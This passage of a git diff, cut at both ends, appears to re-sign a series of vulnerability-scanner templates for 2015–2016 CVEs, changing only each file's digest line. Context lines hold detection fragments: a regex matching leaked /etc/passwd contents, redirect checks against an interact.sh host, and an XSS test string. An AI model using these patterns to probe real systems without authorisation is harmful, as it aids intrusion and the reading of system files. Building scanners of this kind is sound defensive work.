4a0a0047304502204768364244d39e7174ab745661a9b31b5c4a63196ef946111d7805224675b70b022100ffd194906b2d3558567d2e6ac11fa657016da8d600e7908912b66ece312d2f2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205e258464980f4c82ff954b569b1571e3d4c3b8ddb3ee6b9a2fec1680b4fe1ffa022100c331064e024486730778150d8b5c22fe64d3cdb3a0956dd807a5170aee2769ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml index 117fdd6353..8be9c0187c 100644 --- a/http/cves/2015/CVE-2015-3224.yaml +++ b/http/cves/2015/CVE-2015-3224.yaml @@ -54,4 +54,4 @@ http: - data-session-id= case-insensitive: true condition: or -# digest: 4a0a00473045022100c4b2125a78ee523a116fd826ab60375b59dd4e7783faf87bb57fdb018ec7183702203cd169073ca993580b1ad5b798b29f12ea43ea85d77a1f8eb1fce8095e0a0b34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022020354b064be7c3002811f57d9842df15bde98e6b50ddf1dd51805c572f6e204602200d5345769babb2b707fd686e022f805cacbf8216fabc09786c56c79672c5f14e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml index e6e73bdd4f..7687592703 100644 --- a/http/cves/2015/CVE-2015-3337.yaml +++ b/http/cves/2015/CVE-2015-3337.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206b4169ea4037924ebdc00d3cc7130c430dcd5ec43759ee09a9f082345b65f7dd022100c41635084e4f84a3e64265efc16c730e5b4725552238f864784bae130304e1f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ce84a33308ba91f840d72b0a7827eeac30ca40dc21c36c701fc5dbaa6f157a2b022100f31c7e0fdee69d860230c8851f1f3d5365c67282b42a537b80b3326e2c10b744:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml index 75a3533dfb..77fa62312e 100644 --- a/http/cves/2015/CVE-2015-4050.yaml +++ b/http/cves/2015/CVE-2015-4050.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d90f99fa4301493aeb28357b0ea4b46a40cbec4e3b675583644ef665e08e35d802206e03ca08917179f4e6306da4db59165d5a748a0c444859583cc72335a9d4c673:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cdb12fbdd55efd4a36a417af3dd59a6c9ce9fd1847a88795418e2dc805b8f5a40220218f2336204c209621417f54d0af76c9753c78445a9415bdd511fe025e74aa0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index f1e8b0ce01..76052a00b2 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -51,4 +51,4 @@ http: - 'status_code == 200' - 'contains(body_2, "newstatpress_page_nsp_search")' condition: and -# digest: 4b0a00483046022100cb6d01be28991515ac71dda8242c7249446951e8cb1a66461263462841119495022100ef9dc6f15e3e424c0eaa861f7e49c07486bda3c3ce0c48b8dc6ff5ffe611a6f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fcd5207100a25aa6acd80942d2d62778a16671bd660cbca07d14fbd2f428866302203a50b15dd5bb3baa63c92c70557e4decd1922f775ba2d5723d9c48d52600cd0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml index 3564b8856b..5e7c940520 100644 --- a/http/cves/2015/CVE-2015-4074.yaml +++ b/http/cves/2015/CVE-2015-4074.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202842932433472fb23fa32b0fb531bf216b2816d459a655b2302110a3b5e191d9022100bcc4cc9601e498334a410e1ff13dfec9aa1aca4ebca8ad7b044b4709e3ec4860:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100858bd9184ab4903ccc7d5fa3c75fd32dc9262c548751d820e7c72d49c59bcc4e02204c3c23267a39aa31540f8ee763a21847dc7d465a33cbfb9763ac7562f8adbbf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index 2b35be4787..d8b1138b67 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c5529d0f19b2c265d2588980579e3d4b1321312560cec46437ddd2fab8714242022100b4612385d3dbaaad79be28b6f61cd619e9c90dd9b05c6b83e718bd7dbece46b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220030c360d8dfa5d3d6f2131143759e7b592d9e41b96f1343fcca8b5f2d2476b4402204573c142f5c7903e321c0f6d209366a1659d0b19d23feb8610d7aa104af4f7d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4455.yaml b/http/cves/2015/CVE-2015-4455.yaml index ea36b7cd0f..5b94f1ef77 100644 --- a/http/cves/2015/CVE-2015-4455.yaml +++ b/http/cves/2015/CVE-2015-4455.yaml @@ -67,4 +67,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "uploaded_filename\":\"{{filename}}.jpg")' condition: and -# digest: 4b0a0048304602210086997acf11c57218a01b0591b45c9e1e9e0171e8f12c848b7e95c91d35edf190022100973637bca29c3c89a004d205adfe81cc82708d8f58f0d0702faed7113ffcf973:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022078ca2d70ae668cef1731fec1043351a5c346027f11a5db597e9f60a953f42a5a022100924427e22c3329c6e9badf1c9c69e97e8fca728ccfee6e73e656b4b388ab0df4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4632.yaml b/http/cves/2015/CVE-2015-4632.yaml index 9b15f9d743..407f940693 100644 --- a/http/cves/2015/CVE-2015-4632.yaml +++ b/http/cves/2015/CVE-2015-4632.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b05f415f11986e6b3ad650b585140749b2b8035d73f2931f6e78f4c5f6f5232b02203a635de3c9935dc598ec196c69eb432a53de2c3b9891cb839d776160f1d0fdf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ac8404c129a23234cc232fc82c4a72092885e1a6beb927ec0013b546a0493efe02204382b75d9ad57c13691d86c89e4f7862f9ace0967a14b88e7c0fe98dd60f7fbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml index dcfea4e355..a2c129b6b9 100644 --- a/http/cves/2015/CVE-2015-4666.yaml +++ b/http/cves/2015/CVE-2015-4666.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009504e159cca2e8deb672bbe64a5cb5a8e8ff799780737da40e678ffc7d3e8e32022100af48ee950842847322cef0c2137c1dcbeceda0acf700cdde60d7c2e7d1a02175:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201a7b1f661191d5cf0cd3b6698c57549de62930e8b8b37f08e83b34383402682302202a841a227aba2b9fd4c73cf72d41a36ca80ce54068a4ff45c65ea18ea873b68e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml index 12ca3e511e..f36d3bc2fe 100644 --- a/http/cves/2015/CVE-2015-4668.yaml +++ b/http/cves/2015/CVE-2015-4668.yaml @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a004830460221009ee0f100e63fe1fb1f2fce30cefa8ea106fd61cde30ad3bbfe3ca713cc92dec602210098683f371b4cedc1c1d7f39a8a6aba9b813b585294104980333339b5e76ce0a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f4ef8441c6c0d53daadd541f0f21fab47fc4d77af6b930222621893db4913d940221008d246cc60163a5cf4f2bbc7bff089883b2b86e6c275b970bfd4654bad39d9194:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4694.yaml b/http/cves/2015/CVE-2015-4694.yaml index 13b7beca88..bb8fba9680 100644 --- a/http/cves/2015/CVE-2015-4694.yaml +++ b/http/cves/2015/CVE-2015-4694.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220207ba0410481b90cdbf301df5d34518b015c8ec9366803c31be44661113a9e01022044ad895219f4df49dc7037ad7b8420987cde05403fb36fe58603419476a063b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f0496c4fd3aca32d1a2d8344ea8556de9f811cc86996acd4e61d9751af0339fd022100addd126b0e674d7b130b42aa93991ee8b4cf9f989dcf57581901e4ae8c8856cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml index cb35e3d581..d6232d2b3c 100644 --- a/http/cves/2015/CVE-2015-5461.yaml +++ b/http/cves/2015/CVE-2015-5461.yaml @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a0047304502202859b878c456815dc2de4f34ef7ce4fbb5ce6868f17e145a47e5df1cf4a008df022100e1c8f735f6d9f14d8b5ba3d296c48f6b74d7152c59bc4eee04a4f4ee38ea61b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b358a0733787a256d88b76615b87f1297c9438ed3ecb830ab1b792c58a1a954f022100b5fe98f745bc4c696d72f1499e5abb9ee02828c45f878a8d5ff4210f97726828:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml index e4ec4623ba..cfd4bf8191 100644 --- a/http/cves/2015/CVE-2015-5471.yaml +++ b/http/cves/2015/CVE-2015-5471.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202cd291f5c987553fe7226cae955afcf8510a3d8336df8bd95ef30fd3b37acd6202210087d411bcb4248de1f5e045aa50a4ca6aee4f54950d3be9be44c2d64bd8b69287:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201bdf38a3e9f23744d2a793a19f5fdeadd16297d031cbfe68b899cb9960bc9730022100bd87559c0a83dbe87b065f7f381c804560fc2a151ebde23a9a969442df5bedcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml index 6490ab3b0e..d3859d8226 100644 --- a/http/cves/2015/CVE-2015-5531.yaml +++ b/http/cves/2015/CVE-2015-5531.yaml @@ -69,4 +69,4 @@ http: - type: status status: - 400 -# digest: 490a0046304402207c1a1828c260cd9afadd9844c9419a43cc0071d0c854a31ad8e4b6fabcb4d3720220461e43e06c10d317f6b91bfe48ee71c3848bd2d8dcb41ea01f454d3f3281c01a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c3a9f2d041f2e75dd77d111180e573fa77581d495321d5b602b710375e9bab5802204832764c446a039e3d1b93621dab1eb423fe570fc6c226804f3c05bd6bd7b558:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml index 4362111d4d..54e545481e 100644 --- a/http/cves/2015/CVE-2015-5688.yaml +++ b/http/cves/2015/CVE-2015-5688.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205488f218bf2c3c7f54b39eb4a23b2b8168ef4c98f3be02378805ef5f6d92965c022100a55527149f23f2bf1990d33ec040e1260b8a1583966e4680161b9a31a65e5d28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cc89b026ca87cf13ed22d0c5f83b0877852bdffbcfced68e49ece56ac50a6c3d02210081447372c99d6593cace00c9ff9ced844310b75f90b508d792f5ab2e90785dc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml index 46aa09eb58..b6c1463df4 100644 --- a/http/cves/2015/CVE-2015-7245.yaml +++ b/http/cves/2015/CVE-2015-7245.yaml @@ -43,4 +43,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4a0a00473045022100d1aafb8c10f1a664ef200cb0b07719e65cca20f646b773edd9631bbd351283b102206cf94666854313f20d7360c569b2d3fa912b5887a16ae63b1dcf827a26d04341:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022008bab1004e34f044c74689230de8f4d39ef776246196710ce3b9dc0485bb7b65022100a1b73bfc5f2610fc20d5b2d111a819fb675d8fc62d9c3411507de1aa1cbafe8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7297.yaml b/http/cves/2015/CVE-2015-7297.yaml index efce4d7741..622cd844c2 100644 --- a/http/cves/2015/CVE-2015-7297.yaml +++ b/http/cves/2015/CVE-2015-7297.yaml @@ -43,4 +43,4 @@ http: part: body words: - '{{md5({{num}})}}' -# digest: 4b0a00483046022100a76121fd34a701a623fe02d8de446a12a363ff654c9fa1639ad529008c43117a022100e533be8c3fc95b05cc0cc6b3128a8fd970c943c5846fc163dc941f2849144f4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207a3b55b62d3630083acd3ff5ac07b40b36072cd0f19057206fc1c857c76d09100221009f3084a270873f40433bd307963f6139d6ec53c5e9dbcded90a7b58260331e85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml index 4a2e6f00b8..55746ed8e2 100644 --- a/http/cves/2015/CVE-2015-7377.yaml +++ b/http/cves/2015/CVE-2015-7377.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220751822cd9a64218d991be21596af65185eb0cb7a0ce6a8784d0b16b796f15a2d02204fc11d32d252a9e44ee7344d48136104c33912494230c2b75ff8a3c2229b7761:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022057ac21264c23de9dd6686f44744a59263f916311d44d55512d4a00d1a575799302204ffb90cb3c1c00d45cec8b57f7592fd62fa17665ec00217cdda0fba02c722464:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml index 383609faa4..422a417664 100644 --- a/http/cves/2015/CVE-2015-7450.yaml +++ b/http/cves/2015/CVE-2015-7450.yaml @@ -69,4 +69,4 @@ http: - type: status status: - 500 -# digest: 4a0a0047304502202263d3f945c0708bfa178b6c8d0508154a99c03081669fa093be19203c3a7e5b022100e9aa4c463965277d6a051f7f0feb71096361d86520eaab7a85c0efda4d469699:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022043bd184feb21ca8bc16b4fb7147c866de4ff696bfb2bdf5302e819afd88c3b6e022075249fac1e933dd96947e253c5e4c1713687f62804c8e9c259b81bcbe2efc03f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index 76babb3ca9..f2bf1ff6ad 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022033310ce04e506b0032c6fb7238353cd6100a3065b45f93695cea8aa316876c630220603da199c7554c8cf879f5ebe7a88fbe5d407438fc5352e3673a1bf713b3685a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206715646176dfaf881abea22a771b13d7191ddac25404b6da18043e32debb045a02206fc7d62fa1245bb84aa68f06446b12741e7c57561bc65de2c4b3992b421ad1b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index 48ac5eaa85..c1fc09a7f9 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a004830460221009e8f50b85daa26e3fc8e68ec98b52d6c22a387e1dfa6ab6e91be8ce1b8508ab3022100ade33462a8ca04ef6ae72e63331f1d1880a4ba45f2ea2180ff659181ccbb5b57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e4cb1accc1f6aa60e3abe2a12e593d2018453a73db8d49cfd30df1a5acba3fe202210098b526e82020fb8a4e0d9d4c50a5a3d986ec9ccb5fd2b6e693561b4b66ed3bee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml index 40f41a116d..af8e7b3406 100644 --- a/http/cves/2015/CVE-2015-8813.yaml +++ b/http/cves/2015/CVE-2015-8813.yaml @@ -39,4 +39,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022050b2f2d4cb0362670660a3a3f24d8775d24b3371b3eac800eec120eca261c2a0022100e10e0949da402a2150d79e9c16d50a38e202ff6c8b4e3c1eecbd5789c9322910:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206499e057c9d3a3e47b97921bc97140a1c6c2665c3f88b9aecdab84e783acc5a1022100f3638d8b005bcf951cc4bcef477dac5cf3438494276100d7cb26b6701140db28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml index 24ac9ef8b7..162581dcbb 100644 --- a/http/cves/2015/CVE-2015-9312.yaml +++ b/http/cves/2015/CVE-2015-9312.yaml @@ -50,4 +50,4 @@ http: - 'contains(body_2, "<img src=x onerror=alert(document.domain)")' - 'contains(body_2, "newstatpress")' condition: and -# digest: 490a0046304402205bcbc563f9a088df9453252c0f326cd0dd26ee9c902cb7f4be973252416080f70220106d8074e730ef5e3f11ecfe53d7ce09c13fe4e22c4afcafd9439def56726a03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220037d8f0bfcb38c7129786dee63ddb500a58c16761f4ce70ef0193c8f7f20b0310221009fed2f7d8acb83f7524e7ac38840dc841af14e6d78431c131dc5131b2b1502bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-9323.yaml b/http/cves/2015/CVE-2015-9323.yaml index 2a0210fefb..e3d78373a4 100644 --- a/http/cves/2015/CVE-2015-9323.yaml +++ b/http/cves/2015/CVE-2015-9323.yaml @@ -52,4 +52,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "404-to-301")' condition: and -# digest: 490a004630440220323384f1c4a276c3079649349540d04cea85e2fe8ce4c73d852567ac9fc5ba7b02203375e2c826ab3ce90ed5672b210ae86d810e572690d581ff587260ceceebb4f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c27236f98002c3fa3feb31b6084010a0885416d66e5f558006f1e087f2c42369022100de53fe3a0f1b9880b34c9db76ee96cd7e8fe47827ba3e6701ed0c0cd911b5942:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-9480.yaml b/http/cves/2015/CVE-2015-9480.yaml index ecfc655446..53d2678193 100644 --- a/http/cves/2015/CVE-2015-9480.yaml +++ b/http/cves/2015/CVE-2015-9480.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205b6c0951be97607789304e920c017d4688b1910f346389d67f4cd410a0fd8dd0022100a8479311b48571c59e35a2d0bff7ccb7a5fe58be76c4cbe82b6491b1b2d6709b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ca3463b6480386c127ceead01d1fba65f58939cbca13de5c6b43f2854051505602205e021914f8bbc4cbc1e20b1f3606f0de3d47057ae412735e8e96fe3679a545f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-0957.yaml b/http/cves/2016/CVE-2016-0957.yaml index 6f4242a870..471468b2a2 100644 --- a/http/cves/2016/CVE-2016-0957.yaml +++ b/http/cves/2016/CVE-2016-0957.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204c01000f7bfc95e33eb45dbcf5a4712b3572527055ecccd3e2921db31c171f3d022069b7039ef57b710a12d2dc565f13665a6328eb7756d5e5304a82666df5c05520:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022047e5bc89fdc028eecb6accc82d9d3416b1743e3d963544f9c7cde9519145db2c022037c360ddf63f09a4574f54b3c6e88b3d5609a5f85dec9c98b70ecb821e7be7c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml index 958d600173..f40b9e4e12 100644 --- a/http/cves/2016/CVE-2016-1000126.yaml +++ b/http/cves/2016/CVE-2016-1000126.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220013dac67a4811933161dbe03eead3bef250ae8d02feba5efd6d39f42544d64e6022100ca5ea281b37719f80730ff5798e2b6963bfd85356337dadb64d627acd3dc86ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202fbf7fb39a9c96b66e0097ca1b13334f89580f737e1ebc73a5e922955b3f566e022032db892d07e36bafcd44def2576c4dbea52b88b5e4efc6e474a9812f051140b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml index 819cd9a4da..1a8d355c70 100644 --- a/http/cves/2016/CVE-2016-1000127.yaml +++ b/http/cves/2016/CVE-2016-1000127.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201fa95a038bca7a976d180543ed0e6ed4a47bd232e52e238bbde22284bb929c9502210084219362e0fc7b0176f542d1b9573a5aae5160e1b35b267dd8bf34f6a4cb1a41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022066ba8a22f14b3e0c57fd136eda6a64628f189a3c0897b09a393c482aeda8cf30022100db804a0cfa3ff0731ece561abe335e1f8003a90341dcb8a314ae4543120ab828:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml index ddc90d9a85..fc0fa74dd2 100644 --- a/http/cves/2016/CVE-2016-1000131.yaml +++ b/http/cves/2016/CVE-2016-1000131.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220407a865ce50567b9cfec98ff87801912e6a450a0cc7cb90608a2bcefb09326e2022100fa66ee427289bd34d36b90328ed3dd597de4413ef0023d1b1b6f5ff54f0bd5f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ea6ef4d537b1bd7a8f833f12df4da179f34a4f2624dfd7c9890117ff33b055b302206b7f2cdcb13852434928d5cd1d0b91a4ca04e65dc76bdaf79e10357bf77a6bf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000133.yaml b/http/cves/2016/CVE-2016-1000133.yaml index d2a6bff841..5dab7dd47a 100644 --- a/http/cves/2016/CVE-2016-1000133.yaml +++ b/http/cves/2016/CVE-2016-1000133.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f92c4af7bff7cdc26614302a343a2e292a63ffc3dc760a557d3dc5522c84de2a02205c0c45f3fce04749913d9d7e88fb5392529bd0a5afaff6cee77e413325bd531f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c99fea519cda5eafa614700d77b99e359161f4f3af3c183aba7568f3871c940702210089a4d6d77ffef79d9f754d6e768dd69a0274d8925ddda02d058ca54bda2fc2e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml index 2264face94..3329ca918e 100644 --- a/http/cves/2016/CVE-2016-1000137.yaml +++ b/http/cves/2016/CVE-2016-1000137.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ca078885ee89701b0101c68c31266741248f0cd91d17638c44938f0ecc86fc99022100eeb3152a54e3fc1c80a725aa1880ad8ac60b32cc41a7f52f9b9f05f9b96e21c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ec25e6281060d9339067044f5110e8613194f364b3fee806ba5124a7cdca4dbf02207bbf5ebac1e11b387d6db81dcaf382b7d21f7c0b651cbbe19b4a127052c19a2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000138.yaml b/http/cves/2016/CVE-2016-1000138.yaml index 770118966e..34be76c15a 100644 --- a/http/cves/2016/CVE-2016-1000138.yaml +++ b/http/cves/2016/CVE-2016-1000138.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201f497916921501b875878ceba1666d2f55f9f59aa773a30aeb759dbd9ff49d05022015296c72674c1a9c191771b6e5c5d9e61676c016ac61ea6c0aec7b45e2249bcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207ccb36889b8796180c158af5d053cddea2edbd1a802d93fba5f3017279b8bbc4022100a0fea68147acf7638f88337db9baec2750f479b63bc5e74200ff71c9311cf693:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000141.yaml b/http/cves/2016/CVE-2016-1000141.yaml index f5ce2fac75..75ea4696c2 100644 --- a/http/cves/2016/CVE-2016-1000141.yaml +++ b/http/cves/2016/CVE-2016-1000141.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207b38e136a9969ec1f99831e2c7263ca370a24726ca3e1456694b26bb08f2409a022071798757cb48c00cf6d507e23b12a5e1043e8a2142eac179e3c60b0ae9e862a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bf315e4e4b2acd440fce1661b0a78ad199ea7a5208c22039c4b52b2bb7549e6d022100f2a8260024b23ce01882cce685ab0ad2c6c3436d0a96e82e011e398729ce62a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml index bbf7656d47..94c22a42c1 100644 --- a/http/cves/2016/CVE-2016-1000142.yaml +++ b/http/cves/2016/CVE-2016-1000142.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220034124fd53f359794e6e238c8b5b1ab2197fdc51283ea8dd11cf6ddd8fa4df6e02203120eabbf0438bac3e922f39a39edc6ae6c7f924e34a83e237574aa8a1b653c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f116555a765ecc01ed0d4e58b0b862c5dd7e61b4d320431a29a12fab781482c902210087de7745ed7f4e466ed4bd28e2964b67f05bce0967bf45893ecd25893d347c34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml index 9f372ca8b6..4e63553106 100644 --- a/http/cves/2016/CVE-2016-1000148.yaml +++ b/http/cves/2016/CVE-2016-1000148.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100af55ea8a75b6507ffcd4de783bab308e5528311e23b88402b155f7aae52edf1402204a26ad1fb718e585ab042d394312047068437b70d56e60201ba94d88d9008ec5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220700386522ffe5ddfc1a30a6047ae315fc8d1389e1039d14957ae852f08210f76022100c6111d1efffc8cd422bfade29fbd1c4978558677912eda2687b36b1c62d1cf14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml index e2ac7a2657..adae5de88a 100644 --- 